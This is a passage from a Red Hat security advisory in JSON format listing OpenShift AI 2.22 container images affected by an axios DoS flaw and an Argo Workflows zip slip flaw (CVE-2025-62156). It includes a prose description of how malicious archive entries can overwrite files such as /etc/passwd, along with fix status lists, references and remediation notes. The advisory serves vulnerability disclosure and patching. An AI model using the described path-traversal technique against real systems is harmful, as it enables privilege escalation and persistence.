"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "axios: Axios DoS via lack of data size check"
},
{
"cve": "CVE-2025-62156",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-14T15:02:10.015356+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2403800"
}
],
"notes": [
{
"category": "description",
"text": "A zip slip flaw has been discovered in the Argo Workflows container engine. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/argoproj/argo-workflows: Argo Workflows Zip Slip",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-62156"
},
{
"category": "external",
"summary": "RHBZ#2403800",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403800"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-62156",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62156"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993",
"url": "https://github.com/argoproj/argo-workflows/blob/946a2d6b9ac3309371fe47f49ae94c33ca7d488d/workflow/executor/executor.go#L993"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011",
"url": "https://github.com/argoproj/argo-workflows/commit/5659ad9b641fcf52c04ed594cd6493f9170f6011"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3",
"url": "https://github.com/argoproj/argo-workflows/commit/9f6bc5d236cd1b24d607943384511d71ad17a4c3"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf",
"url": "https://github.com/argoproj/argo-workflows/security/advisories/GHSA-p84v-gxvw-73pf"
}
],
"release_date": "2025-10-14T14:52:44.502000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-04T13:06:08+00:00",
"details": "For Red Hat OpenShift AI 2.22.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:22759"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
